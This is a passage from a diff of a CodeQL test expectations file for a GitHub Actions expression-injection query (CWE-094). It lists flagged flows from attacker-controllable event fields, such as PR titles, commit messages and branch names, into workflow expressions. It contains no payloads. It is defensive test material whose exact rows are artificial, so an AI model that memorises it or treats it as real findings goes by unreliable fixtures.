github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | github.event.workflow_run.head_repository.description | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 1ea054565bc1..cb924c97ea12 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -1,269 +1,269 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | 